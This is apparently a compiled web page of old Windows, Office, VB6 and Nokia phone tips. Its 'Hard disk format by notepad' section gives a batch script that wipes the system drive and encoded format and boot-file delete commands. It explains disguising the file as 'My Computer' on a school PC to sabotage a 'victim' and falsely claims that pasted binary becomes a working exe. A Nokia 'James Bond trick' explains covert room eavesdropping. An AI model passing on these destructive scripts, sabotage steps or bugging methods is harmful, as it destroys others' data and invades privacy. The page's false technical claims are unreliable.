The battery backup period is very less that sometimes we get frustrated about it!We require more battery backup when we are travelling and where there is no time to charge the batteries. I will show you few steps on how to increase the battery backup and also battery life by 30% !!!!

Steps to increase battery backup

Defragment hard disks Frequently.
Clean the metal pins of the battery with a metal cleaning liquid to remove dirt .
Turn off indexing of files- indexing keeps running in the background also increases usage of the battery.
Use classic themes , to cut down usage of graphics .
For windows 7 disable Aero effects.
Prefer head phones than external speakers.
Avoid playing games..
Use flash drives instead of CD/DVD.
Replace batteries once in 2 years depending upon the usage….
Do not use much of applications which uses more resources, this will drain the battery fast..

Microsoft PowerPoint: Designing Presentations

Display the Ruler
Choose View > Ruler; repeat again to hide. The rulers are marked off in inches and appear to the left and at the top of your slide working area. When you move the pointer or a drawing tool, look for the moving lines on the rulers that show you precisely where you are on the slide.

How Easy Are Your Slides to Read?
Too many presentations are so packed with information they can be illegible. Even complex and confusing slides may be readable if viewed only 18 inches away from a computer monitor.

Try this simple test. Switch to View > Slide Sorter and then choose a 66% view from View > Zoom or the Zoom toolbar button. If you cannot read the slide without a magnifying glass, consider using a larger font, fewer words and/or higher contrast.

Microsoft PowerPoint: Formatting

Easy keyboard shortcuts to change text font sizes (all versions of Microsoft PowerPoint)
Microsoft PowerPoint: Working with Shapes

Creating the Perfect Circle, Square, Star, and More
If you have even tried to draw a circle or square on a slide, you might have noticed that the tool is actually called ellipse or rectangle which does not automatically give you a perfectly
proportional shape.

The next time that you want an evenly proportioned shape, select the toolbar or AutoShape option that you want, press and hold down [Shift] and then draw the object. Release the mouse before letting go of the [Shift] key and you will have a perfect circle (or square). Hold [Shift] again if you need to resize the shape.

This trick can also be used for drawing other shapes including stars, octagons, triangles, and more.

Quickly Copy a Shape
Do you want more copies of your perfect shape? Here's an easy way to make a copy:

1) Click once on the shape to select, 2) Press and hold down [Ctrl] and drag the object to create a copy in a new location.

Easy Alignment:
If you want the original and the copy to be evenly aligned either horizontally or vertically, follow the steps above but also add the [Shift] key which will "constrain" or limit your movement to be only across or up and down.

Limit Your Lines
Most shapes will look more professional onscreen without an outside line or border. To remove the line: 1) Select the object, 2) Click on the drop-down arrow next to the Paintbrush tool in the Drawing toolbar (at the bottom of the screen) or double-click on the object to change the Line to No Line.

Selecting Multiple Objects
To select or highlight more than one object, press and hold down the [Shift] key and click on each object. Click again if you want to de-select an object. All highlighted objects can then be moved, copied, formatted and modified together. Click away from the selected items to un-select them all.

Selecting "Hidden" Objects
With more complex slides, a shape, text box, or other object that you want to work with may be hidden or tucked behind other objects making it difficult to click and select the correct
one. To select slide objects in sequence, press [Tab] repeatedly. Each object, including titles and subtitles, will be individually highlighted each time you press [Tab]. Stop on the one you want to work with. Go backwards by pressing [Shift] + [Tab].

Next, format, delete, copy, move, or re-size the selected object.

Shutdown Computer With Command Prompt or shortcut for shutdown

Here is a trick to shutdown your computer at a specific time. You might be thinking what great about it, well you can shutdown your computer without the use of any software. Just shutdown your computer at specific time from RUN Command. For example if you wish to shutdown at 09:45 am. Type this in
Start=>Run
Type Code: at 11:35 shutdown -s
To cancel or Abort the shutdown:
Type Code: shutdown -a
Type Code: “shutdown –s –m\\computername –t60”. This command will shutdown the computer on network if you have administrative access. Here computername needs to be replaced by the exact computer name of the computer on the network to work.

Alternative method to create a shutdown timer or simply computer shutdown shortcut
Step 1: Right click on your desktop and choose “New=>shortcuts”.
Step 2: In the box that says “Type the location of the shortcut”,
type in “shutdown -s -t 3600” without the quotation marks and click next.
Note: 3600 are the amount of seconds before your computer shuts down. So , this means 3600 seconds = 60 mints (1 hour). You can change the value in the above code. You can even create multiple shutdown shortcuts. For example a computer shutdown shortcut for 30 minutes, 1 hour, 2 hours, 5 hours etc.,
Step 3: Make up a name for the shortcut and you’re done.
Optional Step 4 : You can change the icon by right clicking=>properities=>change icon=>browse
To abort or cancel the shutdown:
To make an abort key to stop the shutdown timer just create another shortcut and make
the “location of the shortcut” to ” shutdown -a” without the quotes.

Hard disk format by notepad

DON'T TRY THE HARMFUL TRICKS MENTIONED, IN YOUR COMPUTER!! lol AND EVERYTHING MENTIONED IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR WON'T BE LIABLE FOR ANY HARM DONE!

At first copy the following binary code exactly:

01001011000111110010010101010101010000011111100000

Paste it in a notepad file.

Save the file as 'whateveryouwish.exe'

When you open it, the hard disk formats!!

You can keep this file in your school's computer in a far-off folder. At first rename it and send a shortcut to desktop. Now hide the original file. Change the icon of the shortcut to that of My computer and rename it as 'My Computer' and delete the original 'My computer'. When someone tries to open it....tada!!

If you are unable to format C drive when the victim's PC is running, then you can use the following line of code:

01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000

It's extremely cool!!

How about making the computer not to boot in the first place??

Then use this code:

01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001

You will be astounded at the result when someone tries to restart the PC!

Here is another nice trick:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

Save the file as '.bat'

I won't disclose the result!(Just try it out yourself!)

If you hadn't known the above-mentioned tricks before, then google some more up! There are plenty of more wonderful tricks which would just blow your mind!

Here is a well-known trick called the 'WTC trick'. The plane that hit the WTC had a flight number of Q33N. Now write ' Q33N' in notepad, change the font size to 72, and change the font to 'Wingdings'. See what happens....

Also try the following trick:

Open notepad and write down: 'this app can break'

Save it as 'xxx.txt'

Quit notepad and open it again to have a surprise!

And here is the bummer:

Type down in notepad: 'Bush hid the facts'

Save this file with 'whateveryouwant.txt'

Exit notepad and open it again!

Keyboard Tricks and shortcut keys

Code Window Shortcuts
Ctrl+F2 (5 star tip) - moves focus to the "Object" combo-box above the Code window. ...from here you can select the procedure you're editing by using DownArrow to drop-down the combo-box's list of objects. Press the first letterof the object name, or UpArrow/DownArrow/Home/End to navigate through the list. Home is good for selecting the (General) section, where non-event-code procedures live. Then, press Tab to toggle between the "Object" and "Procedure" combo-boxes and navigate similarly. Press Return to selectone, and you'll be back in the Code window at the correct position.
Ctrl+Shift+F2 - I mentioned this one before. Greg adds that it works without first pressing Shift+F2, as it cycles through the last 8 positions visited, not just where you were before you viewed the definition of a variable.
F3 - find the next occurrence of text last searched for
Shift+F3 - find the previous occurrence of text last searched for
Ctrl+F3 - find the next occurrence of selected text, or the word under the cursor
Ctrl+Shift+F3 - find the previous occurrence of selected text, or the word under the cursor
The general rule-of-thumb for the previous four is as follows: "Press shift to search backwards; press ctrl to start searching for something different".
F6 - (when the Code window is split into two panes) - toggles between the panes. To split the panes first (or indeed un-split afterwards), press alt+W, P.
Ctrl+Shift+F9 - clear all breakpoints
Tab (when a block is selected) - indent the whole block
Shift+Tab (when a block is selected) - un-indent the whole block
Ctrl+Z - undo the last change. The last 20 changes can be backed out of.
Ctrl+I - show the quick-info tooltip. Tells you the type of variable,or value of a constant, at the cursor.
Ctrl+Shift+I - show the parameter-info tooltip. Tells you the parameters required in a function or sub call, without having to insert a spurious comma and delete it! (which you can't do anyway in modules that are marked as read-only).
Ctrl+G - show the Immediate window.
Ctrl+F - show the Find dialog
Ctrl+H - show the Replace dialog
...within Find and Replace dialogs, the highlighted text (or the word underthe cursor is automatically placed in the Find What field). Press Return to Find Next, Esc to close the dialog, or alt+letter to focus and/or toggle onthe other controls [duh...?]
Ctrl+Y - remove the current line without having to select it. This one was contributed by Joacim Andersson.
Object window shortcuts (i.e. the forms)
Shift+F4 - show the custom property pages for the selected object
Arrow keys - UpArrow/DownArrow/LeftArrow/RightArrow
Select a different control on the container.
With Shift pressed, enlarge/shrink the selected control(s).
With Ctrl pressed, move the selected control(s) around the container.
Tab or Shift-Tab - select the next/previous control in the tab order
Project Explorer window
Tab - switch between projects in a group
Down Arrow - move down the tree
Up Arrow - move up the tree
Right Arrow - expand a folder, or go to the first child node
Left Arrow - collapse (if a folder) and go to the parent node
Numeric Plus - expand the folder
Numeric Minus - collapse the folder
Property window
Tab or Shift+Tab - cycle forwards/backwards through the control drop-down, the tabs, the property name, and the property value. This method can be useful for changing (or just reviewing) several control's properties, eg the TabIndexes (TabIndices? :-). Useful if certain controls are on hidden areas of the form (eg on different tabs of your form) andyou don't want to hunt them down and click (ugh!) on them.
The "Categorized" tab in Properties is dead useful for hiding the other properties if you're reviewing the sizes of your controls. Just click on all the minus signs except for the one next to the "Position" category. Did I say click?! I meant Tab to a property category, press LeftArrow to collapse it, then press DownArrow to move down to the next property category.
Break Mode
Shift+F5 - re-run from the start (surely not that useful?)
F8 - step into the current statement
Shift+F8 - step over the current statement
Ctrl+F8 - run upto the statement under the flashing cursor
Ctrl+Shift+F8 - run the rest of the current procedure and break againwhen exiting back to the calling statement
F8 based shortcuts can also be used from design mode, to start the project and immediately single-step through the code, but I can imagine that stepping through the start-up code of a big project would be very tedious. In fact I bet you'd get a misleading impression of the program flow, because break mode tends to suppress certain events from firing.
Ctrl+F9 - set the statement under the flashing cursor as the next one to execute.
Ctrl+L - view (and navigate) the call stack
Miscallaneous
Ctrl+F4 - close the current child window (as per bog-standard Windows)
Ctrl+F6 or Ctrl+Tab (or with Shift) - cycle forwards/backwards through the Code windows and Object windows
Shift+F7 - go to the Object window. This is the complement of F7 whichyou mentioned.
You want to make more space for the Code window while programming? Hiding the Project Explorer, Properties and Immediate windows is easy:- Ctrl+R, menu, H to hide the Project Explorer window, F4, menu, H to hide the Properties window, Ctrl+G, menu, H to hide the Immediate window.
Here are 2 really shortcuts courtesy of Dean Hutchings:
Assuming you have "Break On All Errors" selected, you can do the following:
Alt+F5 - continue past error dialog
Alt+F8 - step past error dialog
These are great if you want to be sure to see all errors but don't want to mess around with toggling the error trapping settings.
Not necessarily a keyboard shortcut for VB so much as Windows in general; any ListView (Explorer folders included) which is in report (ie, details) view can have its column widths auto-resized by pressing Ctrl+NumericPlus.

All I can say is: Thank you, Greg. These are surely to improve coding speed. In addition, Greg provided some stupid mouse tricks as well, which will be included in an upcoming article.

There are many more simple keyboard shortcuts that for some reason are seldom used by programmers. Below are some of them:
Place the cursor on a function name, then press Shift-F2 combination and it will take you to that function.

Press Ctrl-Shift-F2 and it will take you back. These two combos have been there since the dawn of VB.

Have you ever lost the Project Explorer window? Press Ctrl-R to bring it to life.

Do a quick save before running. Press Ctrl-S.

Never select Start button. Always do a Start With Full Compile. Either press Ctrl-F5 or hold down the Ctrl key while pressing the Start button. (Or as some of my less than competent co-workers call it: The 'Play' button).

Want to do a quick comment/uncomment of your code? See this tip.

Do you want to quickly see the value of a variable? Place a cursor on the variable and press Shift-F9.

To toggle a breakpoint, use F9.

Ctrl-A will select all the code in the Code Window. BTW, if you didn't know this one, please pack up your copy of VB and return it to the store for a full refund. You don't deserve to be a programmer.

Are you sick and tired of going to the Project menu and selecting Components? Simply press Ctrl-T.

To bring up properties for any object in VB, press F4. To bring up code, press F7 on any object.

How to install and boot Windows on an external (USB) hard drive

Please read this guide from start to finish before doing anything

1) Does your computer support booting from USB?

Usually, if it's an option in your BIOS boot sequence menu, the answer to this is yes. If it's not there then the answer is probably no. However, proceed and see what happens.

2) Confirming the "Bootability" of your USB-Drive
Shut down your computer
Connect your USB drive directly to one of your USB ports on your computer, without using a Hub
Disconnect any other hard disk drives (internally) from it
Turn on your computer. Confirm that Bios is set to start from CD
Insert your original Windows XP CD into the drive
Start the installation, and proceed to the section where you are allowed to pick a hard drive
If it goes beyond the partition selection, your drive is already fine for booting Windows XP. If not (seems to be the cases with many of the Freecom USB HDDs for example), you will get an error like "Windows is unable to find your drive, partition, data etc bla". This is usually not a big problem. All you need to do is "properly" format the drive with the NTFS file system. After this, the drives are recognized as valid installation devices by the Windows XP installer. There has been no success reported in using the FAT32 file system for such purposes.

3) Dumping the original Windows Setup CD into an ISO File

Pretty easy one. Simply open WinISO or your ISO program of choice, and select Actions -> Make ISO from CDROM, and save your CD image to a convenient place on your hard disk drive.

4) Extracting the files we need to work on

After the Windows ISO image is done, close and reopen WinISO.(or the program of your choice) Then, open the ISO file you just created using File -> Open.
Now, click the I386 folder, and select the following files (hold down Ctrl key to multi-select)
TXTSETUP.SIF
DOSNET.INF
USB.IN_
USBPORT.IN_
USBSTOR.IN_
Select Actions -> Extract and put the resulting files into a folder on your C: drive. I usually put the files into a new folder called primary (ie C:\primary)

5) Unpacking IN_ files

Use the Cab SDK program from http://support.microsoft.com/kb/310618 and install the tools directly on your C: drive..I install the tools into C:\cabsdk and would recommend you to do the same..This program is meant to be ran from a cmd window..so click start-->run-->cmd and press enter. In the command window, if you installed cabsdk to the folder mentioned above "C:\cabsdk" type the following: cd C:\cabsdk\bin then press enter. and now your command prompt should look like this...
C:\cabsdk\BIN

(The following assumes you saved the files you extraced from the iso file to "C:\primary")..
Next you will want to unpack the .IN_ files by typing in the cmd window:.. cabarc x C:\primary\USB.IN_ then press enter. Repeat this process until you have done it for USB.IN_ USBPORT.IN_ and USBSTOR.IN_ you will then have the following inf files in the BIN directory of the cabsdk folder.
usb.inf
usbport.inf
usbstor.inf
Close the Command window.
5-A) Create a new folder on your C:\ drive:
Name it edited then move the following files from the BIN folder in the cabsdk directory to the folder named edited on your C: drive:
usb.inf
usbport.inf
usbstor.inf
5-B) Copy the following files:
Copy the following files from C:\primary to C:\edited
TXTSETUP.SIF
DOSNET.INF

6) Editing the files
This is the main job. i ll also try to explain a bit whats happening. Use a simple Texteditor... Notepad is the one you want to use. The find uitlity (Ctrl F) Will be your best friend through this process. Also take your time with editing the files. Double..no..triple check everything as you go. There is no harm in being sure you have completed each step correctly.

6-A) TXTSETUP.SIF
This file is loaded on the initial install step by the Windows XP CD installer. In this file, we will change the way Windows treats USB devices during system setup -- the default is to only treat them as input devices during installation -- we will change this to include mass storage driver support (which needs to be loaded into the installer much earlier in order to work).

First, move the following bolded entries from [InputDevicesSupport.Load] to the [BootBusExtenders.Load] section , exactly as shown here.. Note: Delete the bolded lines from [InputDevicesSupport.Load] after you have moved them to [BootBusExtenders.Load]

[BootBusExtenders.Load]
pci = pci.sys
acpi = acpi.sys
isapnp = isapnp.sys
acpiec = acpiec.sys
ohci1394 = ohci1394.sys
usbehci = usbehci.sys
usbohci = usbohci.sys
usbuhci = usbuhci.sys
usbhub = usbhub.sys
usbstor = usbstor.sys

[InputDevicesSupport.Load]
usbehci = usbehci.sys
usbohci = usbohci.sys
usbuhci = usbuhci.sys
usbhub = usbhub.sys
usbccgp = usbccgp.sys
hidusb = hidusb.sys
serial = serial.sys
serenum = serenum.sys
usbstor = usbstor.sys

Now move the bolded entries from [InputDevicesSupport] to [BootBusExtenders] Note: Delete the bolded lines from [InputDevicesSupport]
after you have moved them to [BootBusExtenders]

[BootBusExtenders]
pci = "PCI Bus Driver",files.pci,pci
acpi = "ACPI Plug & Play Bus Driver",files.acpi,acpi
isapnp = "ISA Plug & Play Bus Driver",files.isapnp,isapnp
acpiec = "ACPI Embedded Controller Driver",files.none,acpiec
ohci1394 = "IEEE 1394 Bus OHCI Compliant Port Driver",files.ohci1394,ohci1394
usbehci = "Enhanced Host Controller",files.usbehci,usbehci
usbohci = "Open Host Controller",files.usbohci,usbohci
usbuhci = "Universal Host Controller",files.usbuhci,usbuhci
usbhub = "Generic USB Hub Driver",files.usbhub,usbhub
usbstor = "USB Storage Class Driver",files.usbstor,usbstor

[InputDevicesSupport]
usbehci = "Enhanced Host Controller",files.usbehci,usbehci
usbohci = "Open Host Controller",files.usbohci,usbohci
usbuhci = "Universal Host Controller",files.usbuhci,usbuhci
usbhub = "Generic USB Hub Driver",files.usbhub,usbhub
hidusb = "Human Interface Parser",files.hidusb,hidusb
serial = "Serial Port Driver",files.none,serial
serenum = "Serial Port Enumerator",files.none,serenum
usbstor = "USB Storage Class Driver",files.usbstor,usbstor
usbccgp = "USB Generic Parent Driver",files.usbccgp,usbccgp

Next, we also have to write several keys into the registry. Convieniently, the txtsetup.sif allows you to specify files that are parsed and instered into the registry at install time. Insert the following in the [HiveInfs.Fresh] section: Make sure the entries are lined up

[HiveInfs.Fresh]
AddReg = hivedef.inf,AddReg
AddReg = hivesys.inf,AddReg
AddReg = hivesft.inf,AddReg
AddReg = hivecls.inf,AddReg
AddReg = hiveusd.inf,AddReg
AddReg = dmreg.inf,DM.AddReg
AddReg = usbboot.inf,usbservices

and also in [SourceDisksFiles]

[SourceDisksFiles]
usbboot.inf = 1,,,,,,_x,3,,3
bootvid.dll = 1,,,,,,3_,2,0,0,,1,2
kdcom.dll = 1,,,,,,3_,2,0,0,,1,2

Finally, save and close TXTSETUP.SIF. We are done with it.

6-B) DOSNET.INF
Now, open DOSNET.INF , and change the second [Files] section (yes there are 2 sections called [Files]) to look like this:

[Files]
d1,usbboot.inf
d1,_default.pif
d1,12520437.cpx
d1,12520850.cpx
Save and close DOSNET.INF

6-C) usb.inf

Change the bolded lines in the [StandardHub.AddService] and [CommonClassParent.AddService] sections to resemble the ones below:

[StandardHub.AddService]
DisplayName = %StandardHub.SvcDesc%
ServiceType = 1 ; SERVICE_KERNEL_DRIVER
StartType = 0 ; SERVICE_DEMAND_START
ErrorControl = 1 ; SERVICE_ERROR_NORMAL
ServiceBinary = %12%\usbhub.sys
LoadOrderGroup = Boot Bus Extender

[CommonClassParent.AddService]
DisplayName = %GenericParent.SvcDesc%
ServiceType = 1 ; SERVICE_KERNEL_DRIVER
StartType = 0 ; SERVICE_DEMAND_START
ErrorControl = 1 ; SERVICE_ERROR_NORMAL
ServiceBinary = %12%\usbccgp.sys
LoadOrderGroup = Boot Bus Extender

How to recover corrupted PowerPoint file using TEMP folder?

Today tip will help you to recover the unreadable and corrupted file of Microsoft PowerPoint. Normally PowerPoint open files can become corrupted when you are trying to save it or if you were working on it and your PowerPoint application or windows crashed due to power failure. Windows saves a duplicate copy of working file as a temporary version. There is no need to use any third party software to manage these types of corrupted files, because you can recover them from TEMP folder.

Follow the given steps to recover the corrupted files in MS PowerPoint:

First click on Start button then click on Search option to start your search process.

Here type the *.TMP in "All or part of the file name" box then choose the "Local Hard Drives" option in "Look in" box.

Now click on Search button to start the search process of temporary files on your system local drives.

After some time, windows locate the list to temporary files. Here arrange the all temp files as Date modified.

Now open the PowerPoint and try to open these temp files or double click on that file to run in PowerPoint.

View Admin At Welcome Screen

By default windows XP doesn't show the Administrator in the user list at the welcome screen. Here's a way to get around it.

Now head up to HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\Userlist

create a new DWORD entry and name it as Administrator and change its value to 1.

exit and reboot for the changes to take effect.
To change it back change its value to 0 or simply delete the key.

Nokia Codes Tips and Tricks

Production date (MM/YY)
Purchase date (MM/YY) You can only enter the date once.
Date of last repair (0000=No repair)
Transfer user data to another Nokia phone via Infra-Red

Clock Stopping
To check weather your SIM Card supports clock stopping type-
*#746025625# (*#SIM0CLOCK#)

Revealing the Headphone and Car-Kit menus
Please note that if you do these next tricks, the new menus can't be erased without retoring the factory default settings. To do these tricks you need to short-circuit the pins on the bottom of the phone next to where you plug in you charger.

1. To activate the "Headset" menu, you need to short-circuit pins "3" and "4". After a short time the word "Headset" will be shown in the display. Menu 3-6 is now enabled.
2. To activate the "Car" menu, you need to short-circuit pins "4" and "5". After a short time the word "Car" will be shown in the display. Menu 3-7 is now enabled.

THE REBOOT TRICK
This should work on all software versions of the 6110.
1. Go to the Calendar (Menu-8)
2. Make a note or reminder.
3. Enter some text into the edit box.
4. Hold "Clear" until the whole text is cleared, then press "Back".
5. Press "0". The main screen will now be showing but a space appears on the screen. (you can't see it)
6. Enter 4 digits (e.g. 1234).
7. Use the down arrow to move the cursor to the left side of the numbers and the space (Down arrow twice).
8. Now enter 6 digits and press the call button.

Wait for a few seconds, the screen should start to flash and reboots. It should alsowork on other menus like the "Profiles" menu.

EFR CALL QUALITY
To activate EFR (Enhanced Full Rate) Enter the code-
*3370#
This improves call quality but decreases batterylife by about 5%
To deactivate it, Enter the code-
#3370#

THE JAMES BOND TRICK
If you short-circuit theleft middle and right pins on the bottom of the phone with all connections touching each other, the Nokia software hangs! The profile "Headset" will be activated. Before you do this just activate the "Automatic Answer" in the headset profile and set the ringing volume to "Mute". Now you can use your phone for checking out what people are talking about in a room. Just place it under a table in a room and call it. The phone receives the call without ringing and you can listen to what people are saying.

NETWORK MONITOR
There is a hidden menu inside your Nokia phone. If you want to activate it, you'll have to re-program some chips inside of your phone.
Check your software version. You can only continue if you have v4.33, v4.73 or v5.24.
Take apart the phone.
De-solder the EEPROM (ATMEL AT 24C64).
Read out the data with an EEPROM programmer and save it to a file (Backup).
If you have v.33 or v4.73, change the address "03B8" from "00" to "FF".
If you have v5.24 then change the address "0378" from "00" to "FF".
Write the new data to the EEPROM and solder it back to the phone,
Power on your phone and you should have "Netmonitor" enabled.
The Network Monitor gives you the following information.

Carrier number
MS RX Level in DBM
Received signal quality
MS TX power level
C1 (Path loss criterion, used for cell selection and reselection). The range is -99 to 99.
RTL (Radio link timeout).
Timeslot
Indication of the transmitter status
Information on the Network parameters.
TMSI (Temporary Mobile Subscriber Identity).
Cell identification (Cell ID, Number of cells being used).
MCC (Mobile country code)
MCN (Mobile network code)
LAC (Location area code)
Ciphering (On/Off)
Hopping (On/Off)
DTX (On/Off)
Discard cell barred information

CHECK SIM-LOCK
Note - If you bought your Nokia on UK Vodafone or UK Cellnet you do not need to check this because they both transmit on GSM900, and they don't lock the phones. However if you bought your phone on UK Orange or UK One2one your phone may be blocked. The reason is that they both transmitt on GSM1800. To make a call on GSM1800 you need what is known as a "Dual band" phone. A dual band phone is able to transmit on both GSM900 and GSM1800, so they lock the phones so you can't use it with any other network simcard. If you find that your phone is locked you can try different software to unlock it. (we havn't found one that works yet), or you can ask your service provider who will gladly exchange the 10 digit code for about £35.
This is how to check the status of the 4 different locks. Aslo don't try entering the wrong number, because after 3 times it will block the phone for good.

There are 4 different locks on your Nokia phone.
COUNTRY-LOCK
NETWORK-LOCK
PROVIDER-LOCK
SIMCARD-LOCK
The code to read out the sim-lock status of your phone is

#PW+(MASTERCODE)+(Y)#
# = DOUBLE-CROSS
W = PRESS "*" THREE TIMES
P = PRESS "*" FOUR TIMES
+ = PRESS "*" TWO TIMES
MASTERCODE = 1234567890
Y = NUMBER 1 TO 4
The master code is a secret code. The code has 10 digits, To read out the sim-lock status you can enter every combination you want!
"Y" Shows the status of the network-lock. Here you can enter a number from "1" to "4". The "4" is for the sim-card lock.

SIM-LOCK CHECKS
#PW+1234567890+1# = GIVES PROVIDER-LOCK STATUS
#PW+1234567890+2# = GIVES NETWORK-LOCK STATUS
#PW+1234567890+3# = GIVES COUNTRY-LOCK STATUS
#PW+1234567890+4# = GIVES SIM-CARD-LOCK STATUS.

Create a bootable CD or DVD with or without floppy

With the CD-ROM available on almost every computer nowaday, floppy drives become a history. However, for those who find computers a hobby, might run into a situation when they need to create a bootable CD that works just like the old floppy disk. Unfortunately, to do this, you still need a floppy drive to read your bootup floppy disk. Wait, the good news is, you can just down load a bootable ISO image and burn it to a CD. And even better, we have a copy of an ISO image right here. You can download this image and follow the instructions below, or you can do a web search for more options.

The information on this article will guide you step-by-step how to create a bootable CD/DVD, either using a bootup floppy disk or a boot image file. You will end up having a bootable CD or DVD, with CD-ROM driver supported, that could startup your PC and bring up the command prompt. This is going to be a good starting point, then you can run other utilities such as hard drive ghost, etc..

Many current CD/DVD burning software support the bootable feature. If you already have your favorite burning software, look around to find the bootable option. For this article, I will use the steps and sample screen-shots with the burning tool called Nero.

You will need a boot disk (floppy) or a bootable ISO image to start. If you don't have one, you can download an ISO image here. This boot image is Windows-98 based, which means it uses the Windows 98 bootup sequence, which should do what we need. You can also download different boot disk images from the internet. I've found bootdisk.com has a very good collection.

I assume that you already have Nero installed. Also, it is highly recommended to use a rewritable disc so you can redo the process if you have to.

Launch Nero Burning ROM
At the New Compilation Window, select "CD" from the drop-down menu and select "CD-ROM (Boot)" for CD, (or select "DVD" and "DVD-ROM (Boot)" for DVD)

If you use a bootup floppy disk, insert the floppy disk and select "Bootable logical drive..."

If you use an image file, select "Image File" then click "Browse" to browse to the image.

At the "Open" Window, browse to the location where you saved the boot image and choose the image you wish to use and click "Open" (you might need to change the "Files of type" to "All Files" in order to see files with different extensions.)

Click "New" at the New Compilation Window.
Nero New Compilation Window disappears and Nero brings up its main screen where you can add more files to the CD/DVD if you wish. For example, adding a "ghost" folder with the file "ghost.exe" as follows.
Once you're done adding all the files you wish to, click on the "Burn" icon.

At the "Burn Compilation" Window, select "Burn"!
